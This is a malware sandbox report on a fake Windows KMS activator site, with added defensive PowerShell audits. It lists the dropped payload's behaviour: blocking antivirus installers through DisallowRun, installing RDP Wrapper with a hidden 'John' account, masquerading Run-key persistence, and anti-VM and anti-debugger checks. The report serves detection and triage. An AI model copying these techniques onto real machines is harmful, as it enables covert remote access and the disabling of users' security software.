Analysis
max time kernel: 751s
max time network: 752s
platform: windows10-ltsc_2021_x64
resource: win10ltsc2021-20250410-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250410-en, locale:en-us, os:windows10-ltsc_2021-x64, system
submitted: 19/04/2025, 20:52

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://kms-auto.site/windows-10-activator/
Resource: win10ltsc2021-20250410-en

General
Target: https://kms-auto.site/windows-10-activator/
Malware Config

Signatures
Rms family
Detected Nirsoft tools  2 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource  yara_rule
behavioral1/files/0x00080000000282c9-1839.dat  Nirsoft
behavioral1/files/0x00080000000282d2-1855.dat  Nirsoft
Grants admin privileges  1 TTPs
Uses net.exe to modify the user's privileges.
Identifies VirtualBox via ACPI registry values (likely anti-VM)  2 TTPs  11 IoCs
description  ioc  Process
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  unsecapp.exe (3 times)
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  KMSTools Lite.exe (4 times)
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  KMS.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  update.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  IP.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__  smss.exe
Remote Service Session Hijacking: RDP Hijacking  1 TTPs  3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid  Process
2452  cmd.exe
3932  net.exe
4968  net1.exe
Blocks application from running via registry modification  28 IoCs
Adds applications to Explorer's DisallowRun list. Every name blocked here is an antivirus or anti-malware installer or on-demand scanner, so the policy is used to keep the victim from installing or running a security product after infection. DisallowRun is a per-user Explorer policy: it stops launches from the shell only, and the same binaries still start from a command prompt or under another account.
description  ioc  Process
(DisallowRun below stands for \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun; every entry was written by KMS.exe.)
Key created  \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun  KMS.exe
Set value (int)  DisallowRun = "1"  KMS.exe
Set value (str)  DisallowRun\1 = "eav_trial_rus.exe"  KMS.exe
Set value (str)  DisallowRun\2 = "avast_free_antivirus_setup_online.exe"  KMS.exe
Set value (str)  DisallowRun\3 = "eis_trial_rus.exe"  KMS.exe
Set value (str)  DisallowRun\4 = "essf_trial_rus.exe"  KMS.exe
Set value (str)  DisallowRun\5 = "hitmanpro_x64.exe"  KMS.exe
Set value (str)  DisallowRun\6 = "ESETOnlineScanner_UKR.exe"  KMS.exe
Set value (str)  DisallowRun\7 = "ESETOnlineScanner_RUS.exe"  KMS.exe
Set value (str)  DisallowRun\8 = "HitmanPro.exe"  KMS.exe
Set value (str)  DisallowRun\9 = "360TS_Setup_Mini.exe"  KMS.exe
Set value (str)  DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"  KMS.exe
Set value (str)  DisallowRun\11 = "Cube.exe"  KMS.exe
Set value (str)  DisallowRun\12 = "AVbr.exe"  KMS.exe
Set value (str)  DisallowRun\13 = "AV_br.exe"  KMS.exe
Set value (str)  DisallowRun\14 = "KVRT.exe"  KMS.exe
Set value (str)  DisallowRun\15 = "cureit.exe"  KMS.exe
Set value (str)  DisallowRun\16 = "FRST64.exe"  KMS.exe
Set value (str)  DisallowRun\17 = "eset_internet_security_live_installer.exe"  KMS.exe
Set value (str)  DisallowRun\18 = "esetonlinescanner.exe"  KMS.exe
Set value (str)  DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe"  KMS.exe
Set value (str)  DisallowRun\20 = "MBSetup.exe"  KMS.exe
Set value (str)  DisallowRun\21 = "PANDAFREEAV.exe"  KMS.exe
Set value (str)  DisallowRun\22 = "bitdefender_avfree.exe"  KMS.exe
Set value (str)  DisallowRun\23 = "drweb-12.0-ss-win.exe"  KMS.exe
Set value (str)  DisallowRun\24 = "Cureit.exe"  KMS.exe
Set value (str)  DisallowRun\25 = "TDSSKiller.exe"  KMS.exe
Set value (str)  DisallowRun\26 = "eset_smart_security_premium_live_installer.exe"  KMS.exe
Drops file in Drivers directory  2 IoCs
description  ioc  Process
File opened for modification  C:\Windows\System32\drivers\etc\hosts  cmd.exe
File opened for modification  C:\Windows\System32\drivers\etc\hosts  update.exe
Modifies Windows Firewall  2 TTPs  1 IoCs
pid  Process
3268  netsh.exe
Server Software Component: Terminal Services DLL  1 TTPs  1 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"  RDPWinst.exe
The stock value of this key is %SystemRoot%\System32\termsrv.dll. Pointing TermService at RDP Wrapper's rdpwrap.dll lifts the single-session limit of a client SKU; together with the AllowMultipleTSSessions change and the hidden account listed below, this gives the operator a concurrent RDP login that does not disconnect the user at the console. Any ServiceDll value for TermService other than termsrv.dll in System32 is worth an alert on its own.
Stops running service(s)  4 TTPs
Checks BIOS information in registry  2 TTPs  22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion  KMSTools Lite.exe (4 times), unsecapp.exe (3 times), IP.exe, KMS.exe, update.exe, smss.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  KMSTools Lite.exe (4 times), unsecapp.exe (3 times), IP.exe, KMS.exe, update.exe, smss.exe
Checks computer location settings  2 TTPs  7 IoCs
Looks up country code configured in the registry, likely geofence.
description  ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000\Control Panel\International\Geo\Nation  update.exe, svchost.exe, smss.exe, winserv.exe (3 times), install.exe
Executes dropped EXE  21 IoCs
pid  Process
344  KMSTools Lite.exe
4712  GSetup.exe
5232  install.exe
5576  7zaxxx.exe
1300  W10DigitalActivation.exe
1748  KMS.exe
5544  update.exe
1544  7zaxxx.exe
2748  Office Installer+_x64.exe
476  win.exe
5740  svchost.exe
5132  IP.exe
1968  smss.exe
6072  winserv.exe
5128  winserv.exe
4232  unsecapp.exe
3240  RDPWinst.exe
5680  unsecapp.exe
3728  winserv.exe
3620  winserv.exe
4424  unsecapp.exe
Loads dropped DLL  3 IoCs
pid  Process
1188  msedge.exe
468  msedge.exe
2116  svchost.exe
Modifies file permissions  1 TTPs  64 IoCs
pid  Process
icacls.exe, 64 invocations. PIDs in report order: 3984, 5588, 3932, 4052, 4340, 2224, 4684, 1700, 1808, 5536, 5432, 5976, 4128, 2056, 2316, 480, 5976, 3240, 2772, 3192, 1836, 1356, 4456, 3184, 3304, 1588, 1140, 4104, 5168, 3984, 5904, 4008, 6020, 1260, 2096, 3936, 4556, 4392, 4612, 1756, 2444, 3152, 2200, 4136, 4616, 3508, 5264, 4732, 1344, 5332, 2868, 5988, 5952, 4888, 476, 4984, 1356, 5772, 5912, 6024, 6096, 5444, 5436, 1652
(signature heading not captured; 64 resources match yara_rule themida)
resource  yara_rule
behavioral1/memory/2560-{891,892,893,894,895,896,897,898,900}-0x00007FF641090000-0x00007FF641D3A000-memory.dmp  themida
behavioral1/memory/2936-{964,965,966,967,968,969,970,971,973}-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp  themida
behavioral1/files/0x000a000000028278-979.dat  themida
behavioral1/memory/344-{990,991,992,993,994,995,996,997,999}-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp  themida
behavioral1/memory/4264-{1831,1832,1833,1834,1835,1836,1837,1838,1889,1890,1912,1922,1935,2522}-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp  themida
behavioral1/files/0x00080000000282cc-1860.dat  themida
behavioral1/memory/1748-{1876,1882,1883,1884,1885,1886,1887,1888,1895}-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp  themida
behavioral1/memory/5544-{1911,1913,1914,1915,1916,1917,1918,1921,1930,2505}-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp  themida
behavioral1/files/0x0004000000027075-2765.dat  themida
behavioral1/files/0x0004000000027072-2775.dat  themida
(Per the HideFromDebugger table below, PIDs 2560, 2936, 344 and 4264 are KMSTools Lite.exe, 1748 is KMS.exe and 5544 is update.exe.)
Adds Run key to start application  2 TTPs  1 IoCs
description  ioc  Process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"  IP.exe
The value name borrows that of a Realtek audio driver and the target borrows the name of a Windows binary (taskhostw.exe), but it runs from a user-writable ProgramData directory rather than System32. A Run entry that starts a system-binary name from outside the Windows directory is the detection point.
Checks whether UAC is enabled  1 TTPs  8 IoCs
description  ioc  Process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  KMSTools Lite.exe, KMS.exe, update.exe, IP.exe, smss.exe, unsecapp.exe (3 times)
(signature heading not captured)
pid  Process
4020  powershell.exe
Looks up external IP address via web service  1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
278  ip-api.com
Modifies WinLogon  2 TTPs  1 IoCs
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"  RDPWinst.exe
Written by the same RDP Wrapper installer (RDPWinst.exe) that replaced the TermService ServiceDll above; the two changes together enable concurrent remote sessions.
AutoIT Executable  57 IoCs
AutoIT scripts compiled to PE executables.
resource  yara_rule
behavioral1/memory/2560-{893,894,895,896,897,898,900}-0x00007FF641090000-0x00007FF641D3A000-memory.dmp  autoit_exe
behavioral1/memory/2936-{966,967,968,969,970,971,973}-0x00007FF61F450000-0x00007FF6200FA000-memory.dmp  autoit_exe
behavioral1/memory/344-{992,993,994,995,996,997,999}-0x00007FF736C30000-0x00007FF7378DA000-memory.dmp  autoit_exe
behavioral1/memory/4264-{1833,1834,1835,1836,1837,1838,1889,1890,1912,1922,1935,2522,2792,3251}-0x00007FF7B4130000-0x00007FF7B4DDA000-memory.dmp  autoit_exe
behavioral1/memory/1748-{1883,1884,1885,1886,1887,1888,1895}-0x00007FF7B97F0000-0x00007FF7BA56D000-memory.dmp  autoit_exe
behavioral1/memory/5544-{1914,1915,1916,1917,1918,1921,1930,2505,2793}-0x00007FF7A2980000-0x00007FF7A3980000-memory.dmp  autoit_exe
behavioral1/memory/1968-{2786,2787,2788,2789,2790,2791}-0x00007FF64E820000-0x00007FF64F853000-memory.dmp  autoit_exe
Drops file in System32 directory  7 IoCs
description  ioc  Process
File opened for modification  C:\Windows\System32\GroupPolicy\GPT.INI  powershell.exe
File created  C:\Windows\SysWOW64\unsecapp.exe  IP.exe
File opened for modification  C:\Windows\SysWOW64\unsecapp.exe  IP.exe
File created  C:\Windows\System32\rfxvmt.dll  RDPWinst.exe
File opened for modification  C:\Windows\System32\GroupPolicy  powershell.exe
File opened for modification  C:\Windows\System32\GroupPolicy\gpt.ini  powershell.exe
File created  C:\Windows\System32\GroupPolicy\Machine\Registry.pol  powershell.exe
unsecapp.exe is a genuine Windows (WMI) binary name, but the real one lives under System32\wbem (and SysWOW64\wbem); a copy written directly into SysWOW64 by IP.exe is a masquerade and is the same binary that later appears in the anti-VM, BIOS and UAC checks. rfxvmt.dll is the RemoteFX DLL that the RDP Wrapper installer drops when it is absent from the image. The GroupPolicy writes by powershell.exe show local policy being edited on disk rather than through the registry alone.
Hide Artifacts: Hidden Users  1 TTPs  2 IoCs
description  ioc  Process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"  reg.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"  reg.exe
A UserList value of 0 removes the account "John" from the logon screen and the Settings user list, but the account still exists and can still authenticate, including over RDP; it is the account the net.exe activity above most plausibly created or elevated.
Suspicious use of NtSetInformationThreadHideFromDebugger  11 IoCs
pid  Process
2560  KMSTools Lite.exe
2936  KMSTools Lite.exe
344  KMSTools Lite.exe
4264  KMSTools Lite.exe
1748  KMS.exe
5544  update.exe
5132  IP.exe
1968  smss.exe
4232  unsecapp.exe
5680  unsecapp.exe
4424  unsecapp.exe
Drops file in Program Files directory  52 IoCs
description  ioc  Process
File created  C:\Program Files\Common Files\System\iediagcmd.exe  update.exe
File created  C:\Program Files\RDP Wrapper\rdpwrap.dll  RDPWinst.exe
File created  C:\Program Files\RDP Wrapper\rdpwrap.ini  RDPWinst.exe
File opened for modification  C:\Program Files\RDP Wrapper  smss.exe
File opened for modification  C:\Program Files\RDP Wrapper\rdpwrap.ini  smss.exe
File opened for modification by update.exe (47 directories, report order): C:\Program Files (x86)\Microsoft JDX; C:\Program Files (x86)\AVAST Software; C:\Program Files\Common Files\Doctor Web; C:\Program Files\Common Files\McAfee; C:\Program Files\Loaris Trojan Remover; C:\Program Files (x86)\IObit\Advanced SystemCare; C:\Program Files (x86)\Moo0; C:\Program Files (x86)\Kaspersky Lab; C:\Program Files\Cezurity; C:\Program Files (x86)\GRIZZLY Antivirus; C:\Program Files\Process Lasso; C:\Program Files\Process Hacker 2; C:\Program Files\EnigmaSoft; C:\Program Files\QuickCPU; C:\Program Files (x86)\SpyHunter; C:\Program Files\AVAST Software; C:\Program Files (x86)\Transmission; C:\Program Files\RogueKiller; C:\Program Files\CPUID\HWMonitor; C:\Program Files\ReasonLabs; C:\Program Files\COMODO; C:\Program Files (x86)\AVG; C:\Program Files\DrWeb; C:\Program Files (x86)\SpeedFan; C:\Program Files (x86)\GPU Temp; C:\Program Files (x86)\360; C:\Program Files\Common Files\AV; C:\Program Files (x86)\Panda Security; C:\Program Files (x86)\IObit; C:\Program Files\Transmission; C:\Program Files\Malwarebytes; C:\Program Files\HitmanPro; C:\Program Files\Kaspersky Lab; C:\Program Files\Bitdefender Agent; C:\Program Files (x86)\Wise; C:\Program Files\ByteFence; C:\Program Files (x86)\Cezurity; C:\Program Files\Rainmeter; C:\Program Files\ESET; C:\Program Files\SUPERAntiSpyware; C:\Program Files (x86)\MSI\MSI Center; C:\Program Files\NETGATE; C:\Program Files\Enigma Software Group; C:\Program Files\SpyHunter; C:\Program Files\AVG; C:\Program Files\Ravantivirus; C:\Program Files (x86)\IObit\IObit Malware Fighter
The 47 directories are the install locations of security products (AVAST, AVG, Kaspersky Lab, ESET, Malwarebytes, HitmanPro, Bitdefender, Dr.Web, COMODO, Panda, 360 and others) and of process- and hardware-monitoring utilities (Process Hacker 2, Process Lasso, HWMonitor, SpeedFan, GPU Temp, QuickCPU, MSI Center). update.exe opens them with write access; whether it deletes or only enumerates them is not visible in this table, but the target set is the same kind of software the DisallowRun list blocks.
Drops file in Windows directory  64 IoCs
description  ioc  Process
All 64 entries are "File created" by msedge.exe under C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping<pid>_<id>\, the temporary directory Edge's component updater unpacks into. They are a side effect of the browser being launched to open the sample URL and are not attributable to the dropped payloads. Grouped by unpacker directory:
chrome_Unpacker_BeginUnzipping1188_782306747 (43 files): Notification\notification_fast.bundle.js; json\i18n-notification\ru\strings.json; json\i18n-tokenized-card\nl\strings.json; Notification\notification.bundle.js; json\i18n-hub\fi\strings.json; json\i18n-mobile-hub\nl\strings.json; json\i18n-shared-components\id\strings.json; Mini-Wallet\miniwallet.bundle.js; wallet-icon.svg; wallet-webui-992.268aa821c3090dce03cb.chunk.js; json\i18n-ec\fi\strings.json; json\i18n-hub\el\strings.json; json\i18n-mobile-hub\zh-Hans\strings.json; edge_driver.js; json\i18n-ec\cs\strings.json; json\i18n-tokenized-card\fr-CA\strings.json; Notification\notification_fast.bundle.js.LICENSE.txt; Tokenized-Card\tokenized-card.bundle.js; wallet-webui-708.de49febeeb0e9c77883f.chunk.js; json\i18n-hub\ar\strings.json; json\i18n-hub\ru\strings.json; json\i18n-shared-components\cs\strings.json; json\i18n-notification\de\strings.json; json\i18n-notification-shared\es\strings.json; json\i18n-hub\it\strings.json; json\i18n-mobile-hub\ar\strings.json; json\i18n-notification-shared\fr-CA\strings.json; json\i18n-shared-components\fr\strings.json; json\wallet\wallet-checkout\merchant-site-info.json; json\i18n-notification-shared\ru\strings.json; runtime.bundle.js; json\i18n-hub\hu\strings.json; json\i18n-shared-components\pt-BR\strings.json; json\i18n-tokenized-card\ru\strings.json; json\wallet\wallet-notification-config.json; Notification\notification.html; bnpl\bnpl.html; json\i18n-notification\sv\strings.json; json\i18n-notification-shared\el\strings.json; crypto.bundle.js; json\i18n-mobile-hub\ru\strings.json; json\i18n-notification-shared\de\strings.json; json\i18n-notification-shared\zh-Hans\strings.json
chrome_Unpacker_BeginUnzipping1188_970595340 (7 files): hyph-fr.hyb; hyph-te.hyb; hyph-as.hyb; hyph-mn-cyrl.hyb; hyph-de-1996.hyb; hyph-bg.hyb; hyph-sl.hyb
chrome_Unpacker_BeginUnzipping1188_762528129 (5 files): auto_open_controller.js; edge_driver.js; manifest.json; product_page.js; edge_checkout_page_validator.js
chrome_Unpacker_BeginUnzipping1188_653919595 (3 files): Part-NL; Part-DE; Part-FR
chrome_Unpacker_BeginUnzipping1188_700750315 (2 files): deny_domains.list; deny_etld1_domains.list
chrome_Unpacker_BeginUnzipping1188_1498492656 (1 file): manifest.fingerprint
chrome_Unpacker_BeginUnzipping1188_2024013401 (1 file): sets.json
chrome_Unpacker_BeginUnzipping1188_1972247359 (1 file): manifest.json
chrome_Unpacker_BeginUnzipping468_693472959 (1 file): _metadata\verified_contents.json
Launches sc.exe 8 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process
2200 sc.exe
4884 sc.exe
3708 sc.exe
6032 sc.exe
5656 sc.exe
2516 sc.exe
5696 sc.exe
5876 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
netsh.exe reads this key every time it starts, so the three events below show only that netsh ran. The helper-DLL persistence technique (MITRE ATT&CK T1546.007) is confirmed only if a value under the key was added or changed, and no such write appears in this table.
description ioc Process
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe
-
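A check for the helper-DLL technique itself, added here as an example and not part of the sandbox report: it lists every value under HKLM\SOFTWARE\Microsoft\NetSh, resolves bare file names against System32 the way netsh does, and flags any helper that is missing, lives outside System32, or does not carry a valid Microsoft signature. Run it from an elevated PowerShell on the host being triaged. It assumes the stock helpers are registered as bare DLL names (the Windows default) and that a subject beginning "CN=Microsoft" identifies a Microsoft-signed file, which is a coarse test meant to surface candidates for manual review.

```powershell
# Added example, not from the sandbox report: audit netsh helper DLL registrations.
# netsh.exe loads every DLL listed under this key at start-up, so a value pointing at
# an attacker-controlled DLL gives code execution each time netsh runs (T1546.007).
$key   = 'HKLM:\SOFTWARE\Microsoft\NetSh'
$sys32 = Join-Path $env:SystemRoot 'System32'

$results = foreach ($prop in (Get-ItemProperty -LiteralPath $key).PSObject.Properties) {
    # Skip the PS* metadata that Get-ItemProperty attaches to the returned object
    if ($prop.Name -match '^PS(Path|ParentPath|ChildName|Drive|Provider)$') { continue }

    $dll = [Environment]::ExpandEnvironmentVariables([string]$prop.Value)
    # Stock helpers are registered as bare file names, which netsh resolves from System32
    if (-not [System.IO.Path]::IsPathRooted($dll)) { $dll = Join-Path $sys32 $dll }

    $exists     = Test-Path -LiteralPath $dll -PathType Leaf
    $inSystem32 = $dll.StartsWith("$sys32\", [System.StringComparison]::OrdinalIgnoreCase)
    $msSigned   = $false
    if ($exists) {
        $sig = Get-AuthenticodeSignature -FilePath $dll
        # Coarse signer test (assumption): valid signature with a Microsoft subject
        $msSigned = ($sig.Status -eq 'Valid') -and
                    ($sig.SignerCertificate.Subject -like 'CN=Microsoft*')
    }

    [pscustomobject]@{
        Helper     = $prop.Name
        Path       = $dll
        Exists     = $exists
        InSystem32 = $inSystem32
        MsSigned   = $msSigned
        # Any single failing check is enough to warrant a closer look
        Suspicious = -not ($exists -and $inSystem32 -and $msSigned)
    }
}

$results | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

A helper that is missing on disk is still worth noting: it may have been cleaned up after use, or it may be a name the attacker intends to plant later. Compare the list against a known-good build of the same Windows version before deleting anything.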
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language install.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language W10DigitalActivation.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDPWinst.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GSetup.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7zaxxx.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7zaxxx.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language win.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winserv.exe
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString smss.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 smss.exe
-
Delays execution with timeout.exe 2 IoCs
pid Process
2124 timeout.exe
1808 timeout.exe
-
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
-
Modifies data under HKEY_USERS 3 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895695533523394" msedge.exe
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe
-
Modifies registry class 6 IoCs
description ioc Process
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage smss.exe
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{6D6688C3-7945-484D-B534-F54B959BC780} msedge.exe
Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings msedge.exe
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{B2EED048-F807-45D8-9CDA-850EE2E93D88} msedge.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database smss.exe
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset smss.exe
-
NTFS ADS 3 IoCs
The colon in these paths is the WMI moniker prefix (winmgmts:), not a stream separator: a process that hands that moniker to a file API while C:\ProgramData\Setup is its working directory produces exactly this string. Read the hits as IP.exe and smss.exe querying WMI from that directory rather than as genuine alternate data streams. A process called smss.exe working out of C:\ProgramData\Setup is itself the finding, since the genuine Session Manager runs from System32 and does not use WMI.
description ioc Process
File opened for modification C:\ProgramData\Setup\winmgmts:\ IP.exe
File opened for modification C:\ProgramData\Setup\WinMgmts:\ IP.exe
File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
4100 schtasks.exe
2244 schtasks.exe
5380 schtasks.exe
3784 schtasks.exe
4568 schtasks.exe
4796 schtasks.exe
1356 schtasks.exe
2568 schtasks.exe
-
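The report records eight schtasks.exe and eight sc.exe launches but not their command lines, so the tasks and services they created have to be recovered from the host. The following audit is an added example and not part of the report: it lists every scheduled-task action and every Win32 service whose executable is missing, lives outside the Windows and Program Files trees, or fails Authenticode validation, which is where persistence planted through schtasks and sc typically shows up. Run it from an elevated PowerShell. It assumes the three standard program roots are the only trusted locations; add your own software directories to $trustedRoots if they differ.

```powershell
# Added example, not from the sandbox report: find scheduled tasks and services whose
# executable is missing, lives outside the Windows/Program Files trees, or is unsigned.
$trustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') + '\' }

function Resolve-ImagePath {
    # Pull the executable out of a task action or a service ImagePath string.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cl = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cl.StartsWith('"')) { return $cl.Split('"')[1] }
    # Unquoted path, possibly with spaces and arguments: take the longest prefix that
    # names an existing file (the same ambiguity an unquoted service path exposes).
    $parts = $cl -split ' '
    for ($i = $parts.Count; $i -gt 0; $i--) {
        $candidate = $parts[0..($i - 1)] -join ' '
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }
    return $parts[0]
}

function Test-TrustedImage {
    # True only if the file exists, sits under a trusted root and has a valid signature.
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    $inTrustedDir = $false
    foreach ($root in $trustedRoots) {
        if ($Path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $inTrustedDir = $true }
    }
    $sig = Get-AuthenticodeSignature -FilePath $Path
    return ($inTrustedDir -and $sig.Status -eq 'Valid')
}

$tasks = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
        $img = Resolve-ImagePath $action.Execute
        [pscustomobject]@{
            Kind = 'Task'; Name = "$($task.TaskPath)$($task.TaskName)"
            Image = $img; Arguments = $action.Arguments; Trusted = (Test-TrustedImage $img)
        }
    }
}

$services = foreach ($svc in Get-CimInstance Win32_Service) {
    $img = Resolve-ImagePath $svc.PathName
    [pscustomobject]@{
        Kind = 'Service'; Name = $svc.Name
        Image = $img; Arguments = $svc.PathName; Trusted = (Test-TrustedImage $img)
    }
}

@($tasks) + @($services) | Where-Object { -not $_.Trusted } |
    Sort-Object Kind, Name | Format-Table -AutoSize -Wrap
```

Treat Trusted = False as a triage lead, not a verdict: legitimately installed third-party software outside Program Files will appear too. On a host that ran this sample, the entries to look for are tasks or services whose image resolves to one of the process names in the signatures above (winserv.exe, RDPWinst.exe, smss.exe or svchost.exe outside System32, IP.exe, win.exe) or to anything under C:\ProgramData\Setup.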
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process (repeated entries collapsed; 64 entries in total)
5468 msedge.exe (×2)
2560 KMSTools Lite.exe (×8)
2936 KMSTools Lite.exe (×8)
344 KMSTools Lite.exe (×8)
2120 7zFM.exe (×2)
4264 KMSTools Lite.exe (×32)
5544 update.exe (×4)
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process
2120 7zFM.exe
4712 GSetup.exe
4232 unsecapp.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
pid Process
676 Process not Found (×2)
-
